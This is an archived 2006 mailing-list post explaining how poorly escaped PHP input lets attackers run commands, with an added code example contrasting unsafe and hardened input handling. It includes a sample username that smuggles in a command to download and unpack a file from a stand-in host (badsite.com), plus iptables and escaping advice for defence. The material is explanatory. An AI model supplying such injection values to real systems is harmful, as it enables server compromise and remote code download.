[CS-FSLUG] PHP vulnerabilities?
Tim Young
Tim.Young at LightSys.org
Fri Jun 2 08:42:15 CDT 2006
There are quite a number of ways to do this sort of thing. Most of the
time it is a poorly written PHP (or other language) script. The basic
thing is when you give someone the ability to input something. For
example, a username.
Instead of having a username "Tim", they use something like:
"Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
badfile.tgz')\""
If whoever wrote the php program did not properly escape the variables
on the way in, there is a decent chance that the variable will be used
in some context where it will be executed.
The reason such things occur is because most people, when they are
programming PHP, do not read up on PHP security (from the PHP online
docs). They have some really good information in the contributed
portions of the documentation.
No matter how well you lock down the server itself, if the code you run
on the server is poorly written, it can still be compromised. :)
There are a few good ways to thwart this sort of behavior. A very
simple way, if you cannot program PHP securely, is to use iptables to
disallow outgoing connections from being originated from the server
itself (only allow response packets). Then someone would need to
compromise root to gain the permission to remove your iptables before
they can download files...
- Tim Young
P.S. The code I gave was a non-functional example. It is close to what
would be used, though it should not work breaking into anything. If you
want to have real-life examples that do work, read the PHP security pages.
Ed Hurst wrote:
> Legatus wrote:
>
>
>> of folks. The file probably doesn't exist. It is probably embedded in
>> a PHP script, and the query string calls a function that then generates
>> the file for download. The offending file was probably injected
>> using a buffer overflow or other vulnerability in PHP, or by accessing
>> another site on the same server that has a flaky file upload script,
>> that will allow people to add a full path to the file they are
>> uploading, thus putting the file exactly where they want. There are
>> probably a hundred other ways to do this.
>>
>
> So this is likely generated by a script? Obviously I know nothing of
> PHP, aside from reading about vulnerabilities. I'm guessing a standard
> script is replaced by the cracker, which adds this extra capability
> undetected, eh?
>
>
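As an added illustration (not code from Tim's message or from the list), here is the unsafe pattern he describes next to a hardened PHP version; the `id` command, the allowed username format and the sample inputs are assumptions made for this example.

```php
<?php
// Added example, not from the original post. The command being run ("id"),
// the username format and the sample inputs are assumptions for illustration.

// VULNERABLE: the username is spliced straight into a shell command line.
// A value such as "tim; ..." ends the intended command and starts another,
// which is exactly the failure the mail describes. Never called below.
function lookup_user_unsafe(string $username): string
{
    return (string) shell_exec("id " . $username);
}

// Allow-list check: accept only plausible account names before the value
// reaches any command, query or file path. Stricter than escaping alone.
function is_valid_username(string $username): bool
{
    return preg_match('/^[a-z_][a-z0-9_-]{0,31}$/', $username) === 1;
}

// HARDENED: validate first, then escape as defence in depth so the value
// always reaches the shell as one single-quoted argument, never as syntax.
function lookup_user_safe(string $username): string
{
    if (!is_valid_username($username)) {
        throw new InvalidArgumentException('invalid username: ' . $username);
    }
    return (string) shell_exec('id ' . escapeshellarg($username));
}

// Constructed inputs: a normal name and the kind of value the post warns about.
$inputs = ['tim', "tim; \"exec('wget http://badsite.example/x')\""];
foreach ($inputs as $input) {
    printf("%-48s valid=%-3s escaped=%s\n",
        var_export($input, true),
        is_valid_username($input) ? 'yes' : 'no',
        escapeshellarg($input));
}
```

The second input fails the allow-list and is rejected before any command runs; the `escapeshellarg` column shows that even if it had slipped through, the shell would receive it as a single literal argument rather than as separate commands.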
More information about the Christiansource
mailing list